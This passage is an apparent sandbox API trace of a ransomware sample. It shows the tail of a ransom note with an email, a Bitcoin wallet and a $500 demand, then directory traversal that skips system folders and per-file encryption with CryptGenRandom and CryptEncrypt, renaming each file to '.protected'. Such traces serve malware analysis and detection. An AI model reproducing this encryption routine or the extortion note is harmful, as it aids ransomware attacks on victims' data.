E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.989] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0086.990] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.990] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0086.990] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.990] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0086.990] CloseHandle (hObject=0xb4) returned 1 [0086.990] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0086.990] lstrcmpiW (lpString1="LocalLow", lpString2="Windows") returned -1 [0086.990] lstrcmpiW (lpString1="LocalLow", lpString2="Program Files") returned -1 [0086.990] lstrcmpiW (lpString1="LocalLow", lpString2="Program Files (x86)") returned -1 [0086.990] lstrcmpiW (lpString1="LocalLow", lpString2="$Recycle.bin") returned 1 [0086.990] lstrcmpiW (lpString1="LocalLow", lpString2="System Volume Information") returned -1 [0086.990] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 50 [0086.991] lstrcmpW (lpString1="LocalLow", lpString2=".") returned 1 [0086.991] lstrcmpW (lpString1="LocalLow", lpString2="..") returned 1 [0086.991] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*") returned 52 [0086.991] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0086.991] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.991] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.991] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.991] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.991] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.991] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\.") returned 52 [0086.991] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.991] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0086.991] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.991] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.991] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.991] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.991] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.991] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\..") returned 53 [0086.991] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.991] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.991] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0086.991] lstrcmpiW (lpString1="Adobe", lpString2="Windows") returned -1 [0086.991] lstrcmpiW (lpString1="Adobe", lpString2="Program Files") returned -1 [0086.991] lstrcmpiW (lpString1="Adobe", lpString2="Program Files (x86)") returned -1 [0086.991] lstrcmpiW (lpString1="Adobe", lpString2="$Recycle.bin") returned 1 [0086.991] lstrcmpiW (lpString1="Adobe", lpString2="System Volume Information") returned -1 [0086.991] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe") returned 56 [0086.991] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0086.991] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0086.992] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*") returned 58 [0086.992] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0086.993] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.993] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.993] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.993] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.993] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.993] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\.") returned 58 [0086.993] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.993] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.993] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.993] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.993] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.993] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.993] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.993] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\..") returned 59 [0086.993] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.993] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.993] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.993] lstrcmpiW (lpString1="Acrobat", lpString2="Windows") returned -1 [0086.994] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files") returned -1 [0086.994] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files (x86)") returned -1 [0086.994] lstrcmpiW (lpString1="Acrobat", lpString2="$Recycle.bin") returned 1 [0086.994] lstrcmpiW (lpString1="Acrobat", lpString2="System Volume Information") returned -1 [0086.994] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat") returned 64 [0086.994] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0086.994] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0086.994] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*") returned 66 [0086.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.994] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.994] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.994] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.994] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.994] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.994] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\.") returned 66 [0086.994] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.994] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.995] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.995] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.995] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.995] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.995] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.995] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\..") returned 67 [0086.995] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.995] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.995] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.995] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0086.995] lstrcmpiW (lpString1="10.0", lpString2="Program Files") returned -1 [0086.995] lstrcmpiW (lpString1="10.0", lpString2="Program Files (x86)") returned -1 [0086.995] lstrcmpiW (lpString1="10.0", lpString2="$Recycle.bin") returned 1 [0086.995] lstrcmpiW (lpString1="10.0", lpString2="System Volume Information") returned -1 [0086.995] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0") returned 69 [0086.995] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0086.995] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0086.995] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*") returned 71 [0086.995] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0087.010] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.010] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.010] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.010] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.010] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.010] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\.") returned 71 [0087.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.010] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.010] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.010] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.010] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.010] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.010] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.010] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\..") returned 72 [0087.010] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.010] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.010] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.010] lstrcmpiW (lpString1="rdrmessage.zip", lpString2="Windows") returned -1 [0087.010] lstrcmpiW (lpString1="rdrmessage.zip", lpString2="Program Files") returned 1 [0087.010] lstrcmpiW (lpString1="rdrmessage.zip", lpString2="Program Files (x86)") returned 1 [0087.010] lstrcmpiW (lpString1="rdrmessage.zip", lpString2="$Recycle.bin") returned 1 [0087.010] lstrcmpiW (lpString1="rdrmessage.zip", lpString2="System Volume Information") returned -1 [0087.010] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned 84 [0087.010] StrStrIW (lpFirst="rdrmessage.zip", lpSrch=".protected") returned 0x0 [0087.010] lstrcmpW (lpString1="rdrmessage.zip", lpString2="RESTORE_FILES.txt") returned -1 [0087.010] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.010] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned 84 [0087.012] StrStrW (lpFirst="rdrmessage.zip", lpSrch=".txt") returned 0x0 [0087.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned 84 [0087.012] StrStrW (lpFirst="rdrmessage.zip", lpSrch=".rar") returned 0x0 [0087.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned 84 [0087.012] StrStrW (lpFirst="rdrmessage.zip", lpSrch=".zip") returned=".zip" [0087.012] lstrlenW (lpString=".zip") returned 4 [0087.012] lstrlenW (lpString=".zip") returned 4 [0087.012] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.046] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.047] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.047] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.047] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.047] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.047] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.047] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.047] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.048] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.048] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.048] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.048] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ff, lpOverlapped=0x0) returned 1 [0087.048] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.048] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ff, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ff, lpOverlapped=0x0) returned 1 [0087.048] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.048] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.048] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.048] CloseHandle (hObject=0x150) returned 1 [0087.049] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.protected") returned 94 [0087.049] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.protected")) returned 1 [0087.050] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.050] lstrcmpiW (lpString1="ReaderMessages", lpString2="Windows") returned -1 [0087.050] lstrcmpiW (lpString1="ReaderMessages", lpString2="Program Files") returned 1 [0087.050] lstrcmpiW (lpString1="ReaderMessages", lpString2="Program Files (x86)") returned 1 [0087.050] lstrcmpiW (lpString1="ReaderMessages", lpString2="$Recycle.bin") returned 1 [0087.050] lstrcmpiW (lpString1="ReaderMessages", lpString2="System Volume Information") returned -1 [0087.050] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned 84 [0087.050] StrStrIW (lpFirst="ReaderMessages", lpSrch=".protected") returned 0x0 [0087.050] lstrcmpW (lpString1="ReaderMessages", lpString2="RESTORE_FILES.txt") returned -1 [0087.050] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.050] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned 84 [0087.051] StrStrW (lpFirst="ReaderMessages", lpSrch=".txt") returned 0x0 [0087.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned 84 [0087.051] StrStrW (lpFirst="ReaderMessages", lpSrch=".rar") returned 0x0 [0087.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned 84 [0087.051] StrStrW (lpFirst="ReaderMessages", lpSrch=".zip") returned 0x0 [0087.051] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2000, lpOverlapped=0x0) returned 1 [0087.061] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.061] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2000, lpOverlapped=0x0) returned 1 [0087.061] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.061] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.062] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.062] CloseHandle (hObject=0x150) returned 1 [0087.062] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.protected") returned 94 [0087.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages.protected")) returned 1 [0087.063] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.063] lstrcmpiW (lpString1="Search", lpString2="Windows") returned -1 [0087.063] lstrcmpiW (lpString1="Search", lpString2="Program Files") returned 1 [0087.063] lstrcmpiW (lpString1="Search", lpString2="Program Files (x86)") returned 1 [0087.063] lstrcmpiW (lpString1="Search", lpString2="$Recycle.bin") returned 1 [0087.063] lstrcmpiW (lpString1="Search", lpString2="System Volume Information") returned -1 [0087.063] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search") returned 76 [0087.063] 